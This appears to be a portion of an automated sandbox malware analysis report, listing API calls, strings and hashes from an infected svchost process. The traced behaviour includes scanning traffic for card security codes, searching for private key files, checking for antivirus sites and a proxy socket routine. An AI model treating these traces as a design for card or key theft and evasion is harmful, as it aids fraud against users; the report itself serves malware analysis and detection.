                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C9DC23
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,02CDF5DC), ref: 02C9DC39
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapChangeCloseCompatibleComputerCountDeleteDesktopErrorFindLastLookupNameNotificationObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 3490689938-820036962
                                                                                                                                                                                                              • Opcode ID: ba48f2f0a5d0e85a2dffea39c8d0e922a21144bf9c966d0ef73087c8ccd46d37
                                                                                                                                                                                                              • Instruction ID: 3bb23f3d5695a619167058dbd9ae67bea47877caa73cf53a14fc4fd4ad55b11d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba48f2f0a5d0e85a2dffea39c8d0e922a21144bf9c966d0ef73087c8ccd46d37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD516171FC1305BAFB20ABA59C4AFA977A86B84B41F544615B702FA1C0DBF0A510CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,74DEF380,00000000,00000001,00000000,?,?,?,02CA8A44,?,?,?,?,?), ref: 02CAE433
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE441
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE44D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE45B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE467
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02CA8A44,?,?,?,?,?,?), ref: 02CAE479
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAE48F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAE4A2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02CAE50B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02CAE512
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAE522
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAE580,00000000,00000000,00000000), ref: 02CAE548
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAE560
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAE571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                              • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                              • API String ID: 1632825432-2817208116
                                                                                                                                                                                                              • Opcode ID: 98aade386a48b1885374b392cdf34ede33207e624e73181e222d3e70375c5192
                                                                                                                                                                                                              • Instruction ID: 128183207ac910e31531dc42e2738a4e517b1729eb296ee47a067c637ff60dde
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98aade386a48b1885374b392cdf34ede33207e624e73181e222d3e70375c5192
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77418830A417132BE3228A3A7C79FBF379D4F8564EF684630E944D7241EB60C71582E4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02CA9B39
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA9B42
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02CA9B4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA9B4F
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02CA9B75
                                                                                                                                                                                                              • send.WS2_32(?,02CD9E4C,00000002,00000000), ref: 02CA9BCC
                                                                                                                                                                                                              • send.WS2_32(?,02CDE1CC,00000002,00000000), ref: 02CA9BF2
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02CA9C18
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02CA9C92
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000005), ref: 02CA9CC7
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02CA9D0D
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02CA9D24
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 02CA9D37
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02CA9D47
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02CA9D5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02CA9D67
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA9D6E
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 02CA9D7A
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 02CA9D9C
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02CA9DB6
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02CA9DD0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA9970,?,00000000,00000000), ref: 02CA9DEA
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02CA9CBC
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: shutdown.WS2_32(?,00000001), ref: 02CA990B
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: shutdown.WS2_32(02CA99EC,00000001), ref: 02CA9910
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: recv.WS2_32(02CA99EC,?,00000400,00000000), ref: 02CA992F
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: recv.WS2_32(?,?,00000400,00000000), ref: 02CA9945
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: closesocket.WS2_32(?), ref: 02CA9959
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: closesocket.WS2_32(02CA99EC), ref: 02CA995C
                                                                                                                                                                                                                • Part of subcall function 02CA98F0: ExitThread.KERNEL32 ref: 02CA9960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA9DFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699211285-0
                                                                                                                                                                                                              • Opcode ID: 56351a7f7f674c00468cb8bfd28597ba0ffa504ef46ac42148f3a0510bd419c2
                                                                                                                                                                                                              • Instruction ID: 1ac61553f0534f829667e6e3eaaa91892503936e9a477dc0905db063761e8bf7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56351a7f7f674c00468cb8bfd28597ba0ffa504ef46ac42148f3a0510bd419c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9591E2B1648342BEE320EF748C96F6BBB9DAF84748F405908F682D61C1D774E944CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avast.com,?,?,02C962EC), ref: 02C961CB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,kaspersky,?,?,02C962EC), ref: 02C961DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,drweb,?,?,02C962EC), ref: 02C961E7
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,eset.com,?,?,02C962EC), ref: 02C961F3
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,antivir,?,?,02C962EC), ref: 02C961FF
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avira,?,?,02C962EC), ref: 02C9620B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virustotal,?,?,02C962EC), ref: 02C96217
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virusinfo,?,?,02C962EC), ref: 02C96223
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,02C962EC), ref: 02C9622F
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,trendsecure,?,?,02C962EC), ref: 02C9623B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,anti-malware,?,?,02C962EC), ref: 02C96247
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.comodo.com,?,?,02C962EC), ref: 02C96253
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: 193a527e4c2a84c4b6613b9f70daac6e1dbbda1c2c285745c7f00cbd6c272102
                                                                                                                                                                                                              • Instruction ID: 80be520f25b2a090cf2a66c8c792fb2b4b038a343610cc93057aed19419988cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 193a527e4c2a84c4b6613b9f70daac6e1dbbda1c2c285745c7f00cbd6c272102
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA0163B2386B16253F21327A0C69F5F438C6EC2ACA3A10634FB01E4488E78AD30304A9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avast.com,?,?,02C962AC), ref: 02C9611B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kaspersky,?,?,02C962AC), ref: 02C9612B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,drweb,?,?,02C962AC), ref: 02C96137
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,eset.com,?,?,02C962AC), ref: 02C96143
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,antivir,?,?,02C962AC), ref: 02C9614F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avira,?,?,02C962AC), ref: 02C9615B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virustotal,?,?,02C962AC), ref: 02C96167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virusinfo,?,?,02C962AC), ref: 02C96173
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02C962AC), ref: 02C9617F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,trendsecure,?,?,02C962AC), ref: 02C9618B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,anti-malware,?,?,02C962AC), ref: 02C96197
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02C962AC), ref: 02C961A3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,7604DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe$p=<u
                                                                                                                                                                                                              • API String ID: 2839743307-310530878
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C9148C,00000000,?), ref: 02C9101B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,74DEF570,?,02C9148C,00000000,?), ref: 02C9103E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C91045
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C91055
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,74DEF570,?,02C9148C,00000000,?), ref: 02C91073
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C9148C,00000000,?), ref: 02C91093
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB0810,00000000,00000000,00000000), ref: 02C910B9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02C9148C,00000000,?), ref: 02C910D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB20D0,00000000,00000000,00000000), ref: 02C910E5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,sign.key,?,02C9148C,00000000,?), ref: 02C910FD
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB2BB0,00000000,00000000,00000000), ref: 02C91116
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,02C9148C,00000000,?), ref: 02C9112A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C9113B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02C91150
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C91153
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02C9115F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02C91162
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                              • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                              • API String ID: 3254303593-2345338882
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C42B7,?,75BFBF00), ref: 02CB10F0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,75BFBF00), ref: 02CB1131
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,75BFBF00), ref: 02CB113B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB1143
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB1154
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,75BFBF00), ref: 02CB115B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02CB119A
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,75BFBF00), ref: 02CB11A7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,75BFBF00), ref: 02CB11F0
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,75BFBF00), ref: 02CB120C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02CB1229
                                                                                                                                                                                                                • Part of subcall function 02CB9780: GetProcessHeap.KERNEL32(00000008,00004070,74DF0F00,00000000,74DF2F00,?,02CA3CE8,?), ref: 02CB9793
                                                                                                                                                                                                                • Part of subcall function 02CB9780: HeapAlloc.KERNEL32(00000000,?,02CA3CE8,?), ref: 02CB9796
                                                                                                                                                                                                                • Part of subcall function 02CB9780: memset.MSVCRT ref: 02CB97AB
                                                                                                                                                                                                                • Part of subcall function 02CB9780: CreateFileA.KERNEL32(02CA3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02CA3CE8,?), ref: 02CB9802
                                                                                                                                                                                                                • Part of subcall function 02CB9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02CA3CE8,?), ref: 02CB9825
                                                                                                                                                                                                                • Part of subcall function 02CB9780: HeapValidate.KERNEL32(00000000,?,02CA3CE8,?), ref: 02CB9828
                                                                                                                                                                                                                • Part of subcall function 02CB9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02CA3CE8,?), ref: 02CB9834
                                                                                                                                                                                                                • Part of subcall function 02CB9780: HeapFree.KERNEL32(00000000,?,02CA3CE8,?), ref: 02CB9837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,75BFBF00), ref: 02CB1258
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C42B7,?,75BFBF00), ref: 02CB1277
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,75BFBF00), ref: 02CB12DB
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,75BFBF00), ref: 02CB12E8
                                                                                                                                                                                                                • Part of subcall function 02CB9910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,74DF2F00), ref: 02CB9991
                                                                                                                                                                                                                • Part of subcall function 02CB9910: _snprintf.MSVCRT ref: 02CB99AD
                                                                                                                                                                                                                • Part of subcall function 02CB9910: FindFirstFileA.KERNEL32(00000000,?), ref: 02CB99BC
                                                                                                                                                                                                                • Part of subcall function 02CB9910: LocalFree.KERNEL32(00000000), ref: 02CB99C9
                                                                                                                                                                                                                • Part of subcall function 02CB9910: wsprintfA.USER32 ref: 02CB9A08
                                                                                                                                                                                                                • Part of subcall function 02CB9910: wsprintfA.USER32 ref: 02CB9A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: A23C42B7$\$inter.zip$path.txt
                                                                                                                                                                                                              • API String ID: 3082343898-1055062414
                                                                                                                                                                                                              • Opcode ID: e7b253b048d9fa05624757711be6a49b4e1da5d78aa063acad880346c7d347ec
                                                                                                                                                                                                              • Instruction ID: d7a70feb2d0e894039ac9213f048882b361eb138c1e31085432076b6854fc2e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7b253b048d9fa05624757711be6a49b4e1da5d78aa063acad880346c7d347ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 336149719412199FDB22CB34DCA8BEB7BE4EF85340F484694E98DD7241DBB19A48CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505,?,?,00000000), ref: 02CB2920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02CB2961
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 02CB296B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB2984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 02CB298B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02CB29BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 02CB29CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02CB2A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02CB2A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02CB2A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: A23C4505$\$path.txt$rfk.zip
                                                                                                                                                                                                              • API String ID: 3351314726-2217154621
                                                                                                                                                                                                              • Opcode ID: 21a1f82f9a2797024272d9143d577de452aaf4e979ad6f107eeeaee84430c23c
                                                                                                                                                                                                              • Instruction ID: 6ac170cc4135507eabfcea537bd478b8150f6657d3cbefd9a0c8332fccf4a53b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21a1f82f9a2797024272d9143d577de452aaf4e979ad6f107eeeaee84430c23c
